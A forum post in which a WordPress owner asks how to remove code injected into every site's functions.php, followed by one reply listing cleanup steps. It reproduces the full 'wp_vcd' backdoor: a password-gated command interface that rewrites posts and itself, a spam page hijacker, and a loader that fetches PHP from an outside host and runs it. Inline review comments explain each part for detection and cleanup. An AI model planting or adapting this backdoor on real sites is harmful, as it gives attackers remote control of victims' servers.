All WordPress site hacked on my server code injection [duplicate]


I’ve been searching for a long time but haven’t found a solution to this issue. Today I am seeing the code below in all my WordPress sites hosted on the same server; it is being injected into the themes’ functions.php files.

Please help! How do I remove this?

<?php



// NOTE(review): this block is injected malware, not theme code. It is an
// attacker command interface: it runs only when a request carries both an
// `action` and a `password` parameter and the password equals the hard-coded
// string below (compared with loose `==`). The block ends in die(""), so the
// normal WordPress page is never rendered for such a request.
// Defensive use: the literal password string, the "wp_vcd" marker and the
// "ERROR_WP_ACTION WP_V_CD" message are fixed strings that can be searched for
// in theme files and backups; requests carrying `action` + `password`
// parameters are worth looking for in access logs (parameters sent in a POST
// body will not normally appear there).
// NOTE(review): the listing appears to have lost backslashes when it was
// pasted (see "rn" below and the `$` at the start of two regexes), so treat it
// as an approximate copy of what is on disk, not an exact sample to match on.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'db390680f4bc0d087d6824781eabbdaa'))

    {

// Name of the marker <div> the code wraps around content it injects into posts.
$div_code_name="wp_vcd";

        switch ($_REQUEST['action'])

            {

                // Inventory: for every published post, print its guid, its ID and
                // whatever currently sits inside the marker div in post_content.
                case 'get_all_links';

                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)

                        {

                            $data['code'] = '';



                            if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))

                                {

                                    $data['code'] = $_[1];

                                }



                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "rn";

                        }

                break;



                // Post tampering: strip any existing marker div from the post named by
                // the request's `id`, append a new marker div holding the request's
                // `data` value (when non-empty), and write the result back with UPDATE.
                // Cleanup implication: injected content lives in the posts table, so
                // removing files alone leaves it in place; search post_content for
                // the marker div.
                case 'set_id_links';

                    if (isset($_REQUEST['data']))

                        {

                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');



                            $post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);

                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';



                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)

                                {

                                    print "true";

                                }

                        }

                break;



                                // Self-modification: read this file, look up the current
                                // $div_code_name value, replace it with the request's `newdiv`
                                // and write the file back (errors suppressed with @).
                                // Detection implication: the marker name may differ from
                                // "wp_vcd" on other infected copies.
                                case 'change_div';

                    if (isset($_REQUEST['newdiv']))

                        {



                            if (!empty($_REQUEST['newdiv']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/$div_code_name="(.*)";/i',$file,$matcholddiv))

                                                                                                             {

                                                                                                   echo $matcholddiv[1][0];

                                                                                       $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }





                                                                            }

                                }

                        }

                break;



                // Self-modification: find the host in this file's
                // file_get_contents("http://.../code.php") call and replace it with the
                // request's `newdomain`, then write the file back.
                // Detection implication: the remote host may differ between infected
                // copies, so a single domain is not a complete network indicator.
                case 'change_domain';

                    if (isset($_REQUEST['newdomain']))

                        {



                            if (!empty($_REQUEST['newdomain']))

                                {

                                                                           if ($file = @file_get_contents(__FILE__))

                                                                            {

                                                                                                 if(preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code.php/i',$file,$matcholddomain))

                                                                                                             {



                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

                                                                                       @file_put_contents(__FILE__, $file);

                                                               print "true";

                                                                                                             }





                                                                            }

                                }

                        }

                break;



                // Page store: with `remove_page` set, delete the row for the given url
                // from the `<prefix>datalist` table; otherwise, when `content` is
                // non-empty, insert or update a row (url, title, keywords, description,
                // content, full_content) taken from the request.
                // NOTE(review): `datalist` does not look like a core WordPress table;
                // confirm, and check the database for it during cleanup.
                case 'create_page';

                    if (isset($_REQUEST['remove_page']))

                        {

                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))

                                {

                                    print "true";

                                }

                        }

                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))

                        {

                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

                                {

                                    print "true";

                                }

                        }

                break;



                // Unknown action: print a fixed error string (another searchable marker).
                default: print "ERROR_WP_ACTION WP_V_CD";

            }



        // End the request here so only the command output is returned.
        die("");

    }





// NOTE(review): injected malware, not theme code. Page hijack: when the
// `<prefix>datalist` table holds exactly one row whose `url` equals the
// requested URI, the stored row is printed in place of the site's own page and
// the request ends at `exit`. The rows come from the database, so this keeps
// working until the table contents are removed as well as this code.
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )

    {

        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');

        // full_content set: the stored content is sent as the entire response,
        // unescaped.
        if ($data -> full_content)

            {

                print stripslashes($data -> content);

            }

        // Otherwise the stored title, keywords, description and content are wrapped
        // in an HTML skeleton built with the theme's own template functions, with a
        // robots meta of "index, follow".
        // NOTE(review): presumably this is meant to get the stored pages indexed by
        // search engines as part of the site; confirm against the table contents.
        else

            {

                print '<!DOCTYPE html>';

                print '<html ';

                language_attributes();

                print ' class="no-js">';

                print '<head>';

                print '<title>'.stripslashes($data -> title).'</title>';

                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';

                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';

                print '<meta name="robots" content="index, follow" />';

                print '<meta charset="';

                bloginfo( 'charset' );

                print '" />';

                print '<meta name="viewport" content="width=device-width">';

                print '<link rel="profile" href="http://gmpg.org/xfn/11">';

                print '<link rel="pingback" href="';

                bloginfo( 'pingback_url' );

                print '">';

                wp_head();

                print '</head>';

                print '<body>';

                print '<div id="content" class="site-content">';

                print stripslashes($data -> content);

                get_search_form();

                get_sidebar();

                get_footer();

            }



        // Stop before WordPress renders the real page for this URI.
        exit;

    }





// NOTE(review): injected malware, not theme code. Remote code loader: when
// wp_temp_setup() is not yet defined, this fetches a response from a remote
// host over plain HTTP and executes it as PHP inside the WordPress process.
// Because the executed code is chosen by the remote side at request time, what
// ran on this server cannot be known from this file alone; deleting the visible
// code does not undo whatever the fetched code did, so cleanup should assume
// anything PHP could read or write may have been touched.
// Defensive use: outbound HTTP from the web server to the host below (or to
// whatever host this call names on another copy) is a network indicator;
// blocking outbound HTTP from PHP, or disabling allow_url_fopen where the site
// does not need it, stops this particular fetch.
if ( ! function_exists( 'wp_temp_setup' ) ) {  

// The site's host name and the requested URI are sent to the remote server as
// the `i` query parameter.
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];



// Errors are suppressed with @; the rest runs only when a non-empty response
// came back.
if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))

{





// Writes $phpCode to a temporary file in the system temp directory (name prefix
// "wp_temp_setup"), includes it so that it executes, deletes the file, and
// returns the variables defined in this function's scope after the include.
// The file is unlinked right after it runs, so it will not normally be found
// on disk afterwards.
function wp_temp_setup($phpCode) {

    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");

    $handle = fopen($tmpfname, "w+");

    fwrite($handle, "<?phpn" . $phpCode);

    fclose($handle);

    include $tmpfname;

    unlink($tmpfname);

    return get_defined_vars();

}



// Import every variable returned by the fetched code into the surrounding scope.
extract(wp_temp_setup($tmpcontent));

}

}









?>


1 thought on “All WordPress site hacked on my server code injection [duplicate]”

  1. What I did to solve the problem
    1. In the wp-includes directory, delete the wp-vcd.php and class.wp.php files.
    2. In the wp-includes directory, open post.php and delete the first PHP tag added by the malware.
    3. Open the theme’s functions.php file and delete the above code.
